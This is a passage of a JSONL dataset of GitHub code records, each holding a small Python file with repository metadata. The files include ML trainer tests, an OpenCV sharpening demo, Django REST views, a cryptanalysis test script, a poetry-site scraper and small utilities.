"api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "23951943790", "text": "import logging\nimport os\nimport shutil\nimport unittest\nfrom copy import copy\n\nfrom pathlib import Path\nimport yaml\nimport numpy as np\nfrom unittest.mock import patch, Mock\n\nfrom ISR.models.cut_vgg19 import Cut_VGG19\nfrom ISR.models.discriminator import Discriminator\nfrom ISR.models.rrdn import RRDN\nfrom ISR.train.trainer import Trainer\n\n\nclass TrainerClassTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.setup = yaml.load(open(os.path.join('tests', 'data', 'config.yml'), 'r'))\n cls.RRDN = RRDN(arch_params=cls.setup['rrdn'], patch_size=cls.setup['patch_size'])\n cls.f_ext = Cut_VGG19(patch_size=cls.setup['patch_size'] * 2, layers_to_extract=[1, 2])\n cls.discr = Discriminator(patch_size=cls.setup['patch_size'] * 2)\n cls.weights_path = {\n 'generator': os.path.join(cls.setup['weights_dir'], 'test_gen_weights.hdf5'),\n 'discriminator': os.path.join(cls.setup['weights_dir'], 'test_dis_weights.hdf5'),\n }\n cls.temp_data = Path('tests/temporary_test_data')\n \n cls.not_matching_hr = cls.temp_data / 'not_matching_hr'\n cls.not_matching_hr.mkdir(parents=True)\n for item in ['data2.gif', 'data1.png', 'data0.jpeg']:\n (cls.not_matching_hr / item).touch()\n \n cls.not_matching_lr = cls.temp_data / 'not_matching_lr'\n cls.not_matching_lr.mkdir(parents=True)\n for item in ['data1.png']:\n (cls.not_matching_lr / item).touch()\n \n cls.matching_hr = cls.temp_data / 'matching_hr'\n cls.matching_hr.mkdir(parents=True)\n for item in ['data2.gif', 'data1.png', 'data0.jpeg']:\n (cls.matching_hr / item).touch()\n \n cls.matching_lr = cls.temp_data / 'matching_lr'\n cls.matching_lr.mkdir(parents=True)\n for item in ['data1.png', 'data0.jpeg']:\n (cls.matching_lr / item).touch()\n \n with patch('ISR.utils.datahandler.DataHandler._check_dataset', return_value=True):\n cls.trainer = Trainer(\n generator=cls.RRDN,\n discriminator=cls.discr,\n feature_extractor=cls.f_ext,\n lr_train_dir=str(cls.matching_lr),\n hr_train_dir=str(cls.matching_hr),\n lr_valid_dir=str(cls.matching_lr),\n hr_valid_dir=str(cls.matching_hr),\n learning_rate={'initial_value': 0.0004, 'decay_factor': 0.5, 'decay_frequency': 5},\n log_dirs={\n 'logs': './tests/temporary_test_data/logs',\n 'weights': './tests/temporary_test_data/weights',\n },\n dataname='TEST',\n weights_generator=None,\n weights_discriminator=None,\n n_validation=2,\n flatness={'min': 0.01, 'max': 0.3, 'increase': 0.01, 'increase_frequency': 5},\n adam_optimizer={'beta1': 0.9, 'beta2': 0.999, 'epsilon': None},\n losses={'generator': 'mae', 'discriminator': 'mse', 'feature_extractor': 'mse'},\n loss_weights={'generator': 1.0, 'discriminator': 1.0, 'feature_extractor': 0.5},\n )\n \n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.temp_data)\n pass\n \n def setUp(self):\n pass\n \n def tearDown(self):\n pass\n \n def test__combine_networks_sanity(self):\n mockd_trainer = copy(self.trainer)\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 4)\n# self.assertTrue(len(combined.loss_weights) == 4) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0, 1.0, 0.25, 0.25]))\n mockd_trainer.discriminator = None\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 3)\n# self.assertTrue(len(combined.loss_weights) == 3) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0, 0.25, 0.25]))\n mockd_trainer.feature_extractor = None\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 2)\n# self.assertTrue(len(combined.loss_weights) == 1) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0]))\n try:\n mockd_trainer.generator = None\n combined = mockd_trainer._combine_networks()\n except:\n self.assertTrue(True)\n else:\n self.assertTrue(False)\n \n def test__lr_scheduler(self):\n lr = self.trainer._lr_scheduler(epoch=10)\n expected_lr = 0.0004 * (0.5) ** 2\n self.assertTrue(lr == expected_lr)\n \n def test__flatness_scheduler(self):\n # test with arguments values\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 0.03\n self.assertTrue(f == expected_flatness)\n \n # test with specified values\n self.trainer.flatness['increase'] = 0.1\n self.trainer.flatness['increase_frequency'] = 2\n self.trainer.flatness['min'] = 0.1\n self.trainer.flatness['max'] = 1.0\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 0.6\n self.assertTrue(f == expected_flatness)\n \n # test max\n self.trainer.flatness['increase'] = 1.0\n self.trainer.flatness['increase_frequency'] = 1\n self.trainer.flatness['min'] = 0.1\n self.trainer.flatness['max'] = 1.0\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 1.0\n self.assertTrue(f == expected_flatness)\n \n def test_that_discriminator_and_f_extr_are_not_trainable_in_combined_model(self):\n combined = self.trainer._combine_networks()\n self.assertTrue(combined.get_layer('discriminator').trainable == False)\n self.assertTrue(combined.get_layer('feature_extractor').trainable == False)\n \n def test_that_discriminator_is_trainable_outside_of_combined(self):\n combined = self.trainer._combine_networks()\n y = np.random.random((1, self.setup['patch_size'] * 2, self.setup['patch_size'] * 2, 3))\n discr_out_shape = list(self.discr.model.outputs[0].shape)[1:4]\n valid = np.ones([1] + discr_out_shape)\n \n before_step = []\n for layer in self.trainer.discriminator.model.layers:\n if len(layer.trainable_weights) > 0:\n before_step.append(layer.get_weights()[0])\n \n self.trainer.discriminator.model.train_on_batch(y, valid)\n \n i = 0\n for layer in self.trainer.discriminator.model.layers:\n if len(layer.trainable_weights) > 0:\n self.assertFalse(np.all(before_step[i] == layer.get_weights()[0]))\n i += 1\n \n def test_that_feature_extractor_is_not_trainable_outside_of_combined(self):\n mockd_trainer = copy(self.trainer)\n y = np.random.random((1, self.setup['patch_size'] * 2, self.setup['patch_size'] * 2, 3))\n f_ext_out_shape = list(mockd_trainer.feature_extractor.model.outputs[0].shape[1:4])\n f_ext_out_shape1 = list(mockd_trainer.feature_extractor.model.outputs[1].shape[1:4])\n feats = [np.random.random([1] + f_ext_out_shape), np.random.random([1] + f_ext_out_shape1)]\n # should not have optimizer\n try:\n mockd_trainer.feature_extractor.model.train_on_batch(y, [*feats])\n except:\n self.assertTrue(True)\n else:\n self.assertTrue(False)\n \n def test__load_weights(self):\n def check_gen_path(path):\n self.assertTrue(path == 'gen')\n \n def check_discr_path(path):\n self.assertTrue(path == 'discr')\n \n mockd_trainer = copy(self.trainer)\n \n mockd_trainer.pretrained_weights_path = {'generator': 'gen', 'discriminator': 'discr'}\n mockd_trainer.discriminator.model.load_weights = Mock(side_effect=check_discr_path)\n mockd_trainer.model.get_layer('generator').load_weights = Mock(side_effect=check_gen_path)\n mockd_trainer._load_weights()\n \n def test_train(self):\n def nullifier(*args):\n pass\n \n mockd_trainer = copy(self.trainer)\n mockd_trainer.logger = Mock(side_effect=nullifier)\n mockd_trainer.valid_dh.get_validation_set = Mock(return_value={'lr': [], 'hr': []})\n mockd_trainer.train_dh.get_batch = Mock(return_value={'lr': [], 'hr': []})\n mockd_trainer.feature_extractor.model.predict = Mock(return_value=[])\n mockd_trainer.generator.model.predict = Mock(return_value=[])\n mockd_trainer.discriminator.model.train_on_batch = Mock(return_value=[])\n mockd_trainer.model.train_on_batch = Mock(return_value=[])\n mockd_trainer.model.evaluate = Mock(return_value=[])\n mockd_trainer.tensorboard = Mock(side_effect=nullifier)\n mockd_trainer.helper.on_epoch_end = Mock(return_value=True)\n \n logging.disable(logging.CRITICAL)\n mockd_trainer.train(epochs=1, steps_per_epoch=1, batch_size=1, monitored_metrics={})\n", "repo_name": "idealo/image-super-resolution", "sub_path": "tests/train/test_trainer.py", "file_name": "test_trainer.py", "file_ext": "py", "file_size_in_byte": 9444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 18, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ISR.models.rrdn.RRDN", "line_number": 22, "usage_type": "call"}, {"api_name": "ISR.models.cut_vgg19.Cut_VGG19", "line_number": 23, "usage_type": "call"}, {"api_name": "ISR.models.discriminator.Discriminator", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 29, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 51, "usage_type": "call"}, {"api_name": "ISR.train.trainer.Trainer", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 77, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 160, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 168, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 184, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 187, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 188, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 195, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 196, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 197, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 198, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 199, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 200, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 201, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 202, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 203, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 204, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 205, "usage_type": "call"}, {"api_name": "logging.disable", "line_number": 207, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 207, "usage_type": "attribute"}]} +{"seq_id": "35987681756", "text": "#!/usr/bin/python3\n\nfrom PySimpleGUI import Window, Text, Button, WIN_CLOSED\n\nlayout=[\n [Text(\"hello\")],\n [Button(\"Ok\")]\n]\n\nwin = Window(title=\"Hello\", layout=layout, margins=(100, 50))\n\nwhile True:\n event, values = win.read()\n if event == \"Ok\" or event == WIN_CLOSED:\n break\n\nwin.close()\n", "repo_name": "kaoticfire/pyUtilities", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySimpleGUI.Text", "line_number": 6, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 7, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 10, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "8349427308", "text": "\nimport cv2\n\n\ndef on_tb_changed_w(pos):\n w = pos / 10\n print(w)\n imsharpen = cv2.add(im, w * im_diff, dtype=cv2.CV_8UC1)\n cv2.imshow('sharpen', imsharpen)\n\n\n# im = cv2.imread('GolyoAlszik_rs.jpg', cv2.IMREAD_COLOR)\nim = cv2.imread('Hermes_h.jpg', cv2.IMREAD_COLOR)\n# im = cv2.imread('webcam_selfie.jpg', cv2.IMREAD_COLOR)\n\nim_blur = cv2.GaussianBlur(im, (5, 5), 2.0)\nim_diff = cv2.subtract(im, im_blur, dtype=cv2.CV_16S)\n\ncv2.imshow('im', im)\ncv2.imshow('im_blur', im_blur)\n\ncv2.namedWindow('sharpen')\ncv2.createTrackbar('W', 'sharpen', 25, 50, on_tb_changed_w)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "repo_name": "KartalCseh/ImagesProssesing", "sub_path": "Példatár/06_05_a_sharpen.py", "file_name": "06_05_a_sharpen.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.add", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.CV_8UC1", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.subtract", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.CV_16S", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "21532189437", "text": "from api.serializers import Blogsserializer, Projectsserializer\nfrom api.models import Blogs, Projects\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\n\n# Create your views here.\n@api_view(['GET'])\ndef index(request):\n content={\n \"Projects\":\"/projects\",\n \"Blogs\":\"/blogs\"\n }\n return Response(content)\n\n@api_view(['GET'])\ndef projects(request):\n projects=Projects.objects.filter(isfeatured=False)\n featuredproject=Projects.objects.filter(isfeatured=True)\n fps=Projectsserializer(featuredproject,many=True)\n projectserializer=Projectsserializer(projects,many=True)\n return Response({\"active\":projectserializer.data,\"featured\":fps.data})\n\n@api_view(['GET'])\ndef blogs(request):\n blogs=Blogs.objects.filter(active=True)\n bs=Blogsserializer(blogs,many=True)\n return Response(bs.data)\n\n@api_view(['GET'])\ndef blog(request,pk):\n blogs=Blogs.objects.get(pk=pk,active=True)\n bs=Blogsserializer(blogs,)\n return Response(bs.data)\n", "repo_name": "nagadeepsharma/backend", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.response.Response", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 8, "usage_type": "call"}, {"api_name": "api.models.Projects.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "api.models.Projects.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "api.models.Projects", "line_number": 18, "usage_type": "name"}, {"api_name": "api.models.Projects.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "api.models.Projects.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "api.models.Projects", "line_number": 19, "usage_type": "name"}, {"api_name": "api.serializers.Projectsserializer", "line_number": 20, "usage_type": "call"}, {"api_name": "api.serializers.Projectsserializer", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 16, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "api.models.Blogs", "line_number": 26, "usage_type": "name"}, {"api_name": "api.serializers.Blogsserializer", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 24, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects.get", "line_number": 32, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "api.models.Blogs", "line_number": 32, "usage_type": "name"}, {"api_name": "api.serializers.Blogsserializer", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "74970928124", "text": "from partial_key_recovery import EHTRecoveryFromColumns\nfrom keys import load_public, load_private\n\nimport numpy as np\nimport json\n\ndef test_validity(priv, pub):\n if (priv.C * priv.T - pub.A * priv.B).is_zero():\n print(\"The public and private key are valid\")\n else:\n print(\"Error: CT != AB\")\n return False\n return True\n\ndef test_recovery_from_columns(priv, pub):\n C = priv.C\n\n columns = C.columns()\n\n # Randomly shuffle columns\n np.random.seed(2)\n pi = np.random.permutation(len(columns))\n\n randomized_columns = []\n for i in range(len(columns)):\n sgn = np.random.choice([-1,1])\n col = columns[pi[i]] * sgn\n col = [int(ci) for ci in col]\n randomized_columns += [col]\n\n # Print the randomized columns to a file\n with open(\"debug/C.columns\", \"w\") as g:\n for col in randomized_columns:\n g.write(str(col) + \"\\n\")\n\n # Run the key recovery attack with this file.\n with open(\"debug/C.columns\") as f:\n cols = []\n for line in f:\n col = json.loads(line)\n cols += [col]\n\n problem = EHTRecoveryFromColumns(pub, cols, verbose=True)\n priv = problem.solve()\n if priv is None:\n return False\n\n print(\"Key recovery successful.\")\n with open(\"debug/recovered_private.json\", \"w\") as g:\n g.write(priv)\n \n return True\n\ndef main():\n import sys\n fn_sk = sys.argv[1] if len(sys.argv) > 1 else \"debug/private.json\"\n fn_pk = sys.argv[2] if len(sys.argv) > 2 else \"debug/public.json\"\n \n priv = load_private(fn_sk)\n pub = load_public(fn_pk)\n\n assert test_validity(priv, pub)\n assert test_recovery_from_columns(priv, pub)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ucsd-hacc/ehtv3_cryptanalysis", "sub_path": "test_attack.py", "file_name": "test_attack.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.random.seed", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "partial_key_recovery.EHTRecoveryFromColumns", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "keys.load_private", "line_number": 59, "usage_type": "call"}, {"api_name": "keys.load_public", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "26082894630", "text": "\"\"\"Property classes for web-related concepts\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom six.moves.urllib.parse import ParseResult, urlparse #pylint: disable=import-error\n\nfrom .. import basic\n\nclass URL(basic.String):\n \"\"\"String property that only accepts valid URLs\n\n This property type uses :code:`urllib.parse` to validate\n input URLs and possibly remove fragments and query params.\n\n **Available keywords** (in addition to those inherited from\n :class:`String `):\n\n * **remove_parameters** - Query params are stripped from input URL (default\n is False).\n * **remove_fragment** - Fragment is stripped from input URL (default\n is False).\n \"\"\"\n\n class_info = 'a URL'\n\n @property\n def remove_parameters(self):\n \"\"\"Should path and query parameters be stripped\"\"\"\n return getattr(self, '_remove_parameters', False)\n\n @remove_parameters.setter\n def remove_parameters(self, value):\n self._remove_parameters = bool(value)\n\n @property\n def remove_fragment(self):\n \"\"\"Should fragment be stripped\"\"\"\n return getattr(self, '_remove_fragment', False)\n\n @remove_fragment.setter\n def remove_fragment(self, value):\n self._remove_fragment = bool(value)\n\n def validate(self, instance, value):\n \"\"\"Check if input is valid URL\"\"\"\n value = super(URL, self).validate(instance, value)\n parsed_url = urlparse(value)\n if not parsed_url.scheme or not parsed_url.netloc:\n self.error(instance, value, extra='URL needs scheme and netloc.')\n parse_result = ParseResult(\n scheme=parsed_url.scheme,\n netloc=parsed_url.netloc,\n path=parsed_url.path,\n params='' if self.remove_parameters else parsed_url.params,\n query='' if self.remove_parameters else parsed_url.query,\n fragment='' if self.remove_fragment else parsed_url.fragment,\n )\n parse_result = parse_result.geturl()\n return parse_result\n\n @property\n def info(self):\n info = 'a URL string'\n if self.remove_parameters:\n info += ', path or query params removed'\n if self.remove_fragment:\n info += ', fragment removed'\n", "repo_name": "seequent/properties", "sub_path": "properties/extras/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "41", "api": [{"api_name": "six.moves.urllib.parse.urlparse", "line_number": 49, "usage_type": "call"}, {"api_name": "six.moves.urllib.parse.ParseResult", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "74722730362", "text": "from typing import List, Optional, Tuple\nfrom urllib import parse\n\nfrom scrapy.http import HtmlResponse\n\nfrom ashaar.src.base.constants import UNSPECIFIED\nfrom ashaar.src.base.processors import PoetProcessor\n\nfrom ashaar.src.utils import process_multi_spaces\n\nfrom ashaar.src.websites.aldiwan_alarabi.items import AldiwanAlarabiPoetItem\n\n\nclass AldiwanAlarabiPoetProcessor(PoetProcessor):\n def process(\n self,\n response: HtmlResponse,\n _,\n previous_poet: Optional[AldiwanAlarabiPoetItem],\n ) -> Tuple[List[str], AldiwanAlarabiPoetItem, Optional[str]]:\n poem_urls = self.__extract_targets_to_follow(response)\n\n return (\n poem_urls,\n AldiwanAlarabiPoetItem(\n url=response.url,\n name=self.__extract_name(response),\n description=self.__extract_description(response),\n poems=list(),\n )\n if previous_poet is None\n else previous_poet,\n self.__build_next_page_target(response) if poem_urls else None,\n )\n\n def __extract_targets_to_follow(self, response: HtmlResponse) -> List[str]:\n return list(filter(lambda url: 'poemDescription' in url, response.xpath('//tr/td/a/@href').getall()))\n\n def __extract_name(self, response: HtmlResponse) -> str:\n return response.xpath(\"//td[@class='portletTitle']/a/text()\").get()[:-1].strip()\n\n def __extract_description(self, response: HtmlResponse) -> str:\n description = response.xpath('//tr[2]/td/span/text()').get()\n\n if description:\n return process_multi_spaces(description).strip()\n\n return UNSPECIFIED\n\n def __build_next_page_target(self, response: HtmlResponse) -> Optional[str]:\n parsed_url = parse.urlsplit(response.url)\n url_parameters = parse.parse_qs(parsed_url.query)\n\n if 'pager' in response.url:\n url_parameters['pager.offset'][0] = int(url_parameters['pager.offset'][0]) + 20\n return parsed_url._replace(query=parse.urlencode(url_parameters, doseq=True)).geturl()\n else:\n return f\"http://www.aldiwanalarabi.com/poetPage.do?sortBy=By_POEM_LINES_COUNT&poetId={url_parameters['poetId'][0]}&pager.offset=20\" # noqa: E501\n", "repo_name": "ARBML/tnqeeb", "sub_path": "ashaar/src/websites/aldiwan_alarabi/processors/aldiwan_alarabi_poet_processor.py", "file_name": "aldiwan_alarabi_poet_processor.py", "file_ext": "py", "file_size_in_byte": 2261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ashaar.src.base.processors.PoetProcessor", "line_number": 14, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 19, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "ashaar.src.websites.aldiwan_alarabi.items.AldiwanAlarabiPoetItem", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 36, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 39, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 42, "usage_type": "name"}, {"api_name": "ashaar.src.utils.process_multi_spaces", "line_number": 46, "usage_type": "call"}, {"api_name": "ashaar.src.base.constants.UNSPECIFIED", "line_number": 48, "usage_type": "name"}, {"api_name": "scrapy.http.HtmlResponse", "line_number": 50, "usage_type": "name"}, {"api_name": "urllib.parse.urlsplit", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 51, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qs", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 52, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "30193572405", "text": "import logging\nfrom camera import Camera\nfrom mock import MagicMock\nimport time\n\ndef test_camera_mock():\n \n try:\n camera_mock = PicameraMock()\n \n camera = Camera(camera_mock)\n camera.take_picture()\n camera.start_recording()\n \n time.sleep(15)\n \n camera.stop_recording()\n \n time.sleep(5)\n \n camera.start_recording()\n \n time.sleep(5)\n \n camera.take_picture()\n \n time.sleep(10)\n \n camera.stop_recording()\n \n time.sleep(5)\n \n camera.take_picture()\n \n time.sleep(5)\n \n \n #camera.stop()\n \n except KeyboardInterrupt:\n print(\"stooooppp\")\n raise\n \nclass PicameraMock(MagicMock):\n def wait_recording(self, duration):\n time.sleep(2)\n \n def start_recording(self, outstream, format=None, bitrate = None, quality=None):\n self.recording = True\n \n def stop_recording(self):\n self.recording = False\n \ntest_camera_mock()", "repo_name": "monsendag/melis-server", "sub_path": "tests/test_camera.py", "file_name": "test_camera.py", "file_ext": "py", "file_size_in_byte": 1087, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "camera.Camera", "line_number": 11, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 12, "usage_type": "call"}, {"api_name": "camera.start_recording", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "camera.stop_recording", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "camera.start_recording", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "camera.stop_recording", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "camera.take_picture", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "3683756810", "text": "from genericpath import exists\nimport json\n\nclass FileManager:\n @staticmethod\n def createJSONFile(filename, content):\n try:\n file = open(\"{}.json\".format(filename), \"a\")\n jsoncontent = json.dumps(content,indent=3)\n file.write(jsoncontent)\n except FileExistsError:\n pass\n\n @staticmethod\n def checkFileExists(filename):\n return exists(filename)\n\n # Reads a JSON file and returns an object\n @staticmethod\n def readJSONFile(filename):\n # read file\n with open(\"{}.json\".format(filename), 'r') as jsonfile:\n data=jsonfile.read()\n # parse file\n jsonobject = json.loads(data)\n return jsonobject\n", "repo_name": "fsv2860/transfer-playlists", "sub_path": "src/files.py", "file_name": "files.py", "file_ext": "py", "file_size_in_byte": 719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 